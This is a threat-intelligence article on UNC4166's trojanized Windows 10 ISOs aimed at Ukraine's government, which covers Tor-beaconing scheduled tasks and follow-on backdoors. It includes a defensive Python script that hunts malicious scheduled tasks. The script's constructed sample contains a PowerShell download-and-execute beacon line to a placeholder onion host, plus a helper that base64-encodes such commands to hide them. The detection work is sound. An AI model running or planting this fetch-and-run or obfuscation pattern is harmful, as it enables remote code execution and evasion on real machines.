Researchers observed new threat activity, tracked as UNC4166, launching socially engineered supply chain attacks against the Ukrainian government. The group has been distributing trojanized ISO files posing as legitimate Windows 10 installers to deliver malware payloads and additional malicious tools.
According to Mandiant researchers, UNC4166 distributed malicious installers via Ukrainian and Russian platforms for torrent file-sharing.
One of the ISOs pushed in this attack was configured to disable Windows' usual security telemetry and other Windows tasks and services, and to block automatic updates and license verification. A machine built from such an image never receives security patches, so the tampering persists for as long as the installation does.
In mid-July, scheduled tasks were spotted on several infected devices beaconing to .onion Tor domains. These tasks were designed to receive commands that were then executed via PowerShell.
The group uses these tasks to conduct reconnaissance on the victim device and, based on the details collected, selects victims for further tasking.
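The detection a practitioner would want for the pattern above is a sweep of scheduled-task definitions for PowerShell actions that point at Tor hidden services. The following is an added example, not code from the article or from Mandiant's report: it parses task definitions in the Task Scheduler XML schema (as exported with `schtasks /Query /XML` or from the Task Scheduler UI), decodes any `-EncodedCommand` payload, and flags tasks whose arguments reference a `.onion` host. The three task definitions, the task names and the `constructedexmpl.onion` hostname are constructed samples for illustration, not recovered artifacts.

```python
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")
# v2 onion names are 16 base32 chars, v3 names are 56; both use the alphabet a-z2-7.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
PS_BINARY_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def decode_encoded_command(arguments):
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or '' if absent or invalid."""
    m = ENCODED_RE.search(arguments)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_task(task_xml):
    """Inspect every <Exec> action in one exported task definition and return a verdict."""
    # Task Scheduler exports declare encoding="UTF-16"; we already hold decoded text,
    # so drop the declaration rather than let expat reject the mismatch.
    root = ET.fromstring(XML_DECL_RE.sub("", task_xml, count=1))
    result = {
        "task": root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS),
        "powershell": False, "encoded": False, "hidden_window": False, "onion_hosts": set(),
    }
    for action in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS).strip().strip('"')
        arguments = action.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        if not PS_BINARY_RE.search(command):
            continue  # only PowerShell launchers matter for this pattern
        result["powershell"] = True
        decoded = decode_encoded_command(arguments)
        visible = arguments + " " + decoded  # hunt in both the raw and the decoded arguments
        result["encoded"] |= ENCODED_RE.search(arguments) is not None
        result["hidden_window"] |= HIDDEN_RE.search(visible) is not None
        result["onion_hosts"].update(h.lower() for h in ONION_RE.findall(visible))
    result["onion_hosts"] = sorted(result["onion_hosts"])
    # A PowerShell task talking to a .onion host is the pattern described above; encoded or
    # hidden-window PowerShell without a Tor host is worth a look but not conclusive on its own.
    if result["onion_hosts"]:
        result["verdict"] = "tor-beacon"
    elif result["encoded"] or result["hidden_window"]:
        result["verdict"] = "review"
    else:
        result["verdict"] = "benign"
    return result


def build_task_xml(uri, command, arguments):
    """Constructed sample in the Task Scheduler XML schema (not a recovered artifact)."""
    return f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>{escape(uri)}</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>{escape(command)}</Command>
      <Arguments>{escape(arguments)}</Arguments>
    </Exec>
  </Actions>
</Task>"""


def encode_command(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed beacon script; the hostname is a placeholder, not a real onion service.
BEACON_SCRIPT = "iex (New-Object Net.WebClient).DownloadString('http://constructedexmpl.onion/beacon')"

SAMPLE_TASKS = {  # constructed: one non-PowerShell task, one legitimate PowerShell task, one beacon
    "defrag": build_task_xml(r"\Microsoft\Windows\Defrag\ScheduledDefrag",
                             r"%windir%\system32\defrag.exe", "-c -h -o -$"),
    "backup": build_task_xml(r"\IT\NightlyBackup", "powershell.exe",
                             r"-NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    "beacon": build_task_xml(r"\Microsoft\Windows\UpdateCheck",
                             r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                             "-w hidden -nop -enc " + encode_command(BEACON_SCRIPT)),
}


def hunt(tasks):
    """Return the analyses whose verdict is not benign, worst first."""
    rank = {"tor-beacon": 0, "review": 1, "benign": 2}
    findings = [analyze_task(xml) for xml in tasks.values()]
    return sorted((f for f in findings if f["verdict"] != "benign"), key=lambda f: rank[f["verdict"]])


if __name__ == "__main__":
    for finding in hunt(SAMPLE_TASKS):
        print(finding["verdict"], finding["task"], finding["onion_hosts"])
```

The decode step matters more than the onion regex: an operator who hides the hostname inside `-EncodedCommand` defeats a plain string search over the task file, and the same script body run through `encode_command` shows how little effort that takes. Feeding real exports into `analyze_task` only requires reading each XML file as UTF-16 text first.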
After the initial reconnaissance, UNC4166 deployed additional backdoors such as Stowaway and Beacon (AzureSettingSync.dll) to enable additional tradecraft.
Additionally, it delivered secondary toehold backdoors, including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps.
The group used these backdoors to maintain access to the compromised computers, execute commands, transfer files, and steal information, including credentials and keystrokes.
Target overlap with APT28
The organizations targeted by UNC4166 were previously targeted by the Russian-linked APT28 group in disruptive wiper attacks.
The overlap in targets is consistent with the interests of Russia's GRU, and it suggests UNC4166 may be following in the footsteps of other Russian-linked groups that emerged at the onset of the war.
The use of trojanized installation media, followed by selective tasking based on reconnaissance, indicates that the operators behind this campaign are experienced in cyber intrusion and pick their targets deliberately. Such intrusions are hard to detect after the fact, because the malicious code arrives with the operating system itself rather than through a later exploit, so the controls that matter most sit upstream: install Windows only from media obtained directly from Microsoft and verify its hash before use, treat torrent-sourced installers as compromised by default, and monitor for scheduled tasks that launch PowerShell and for outbound Tor traffic. Continuous review and audit of the security posture across the network remains the backstop for catching what those controls miss.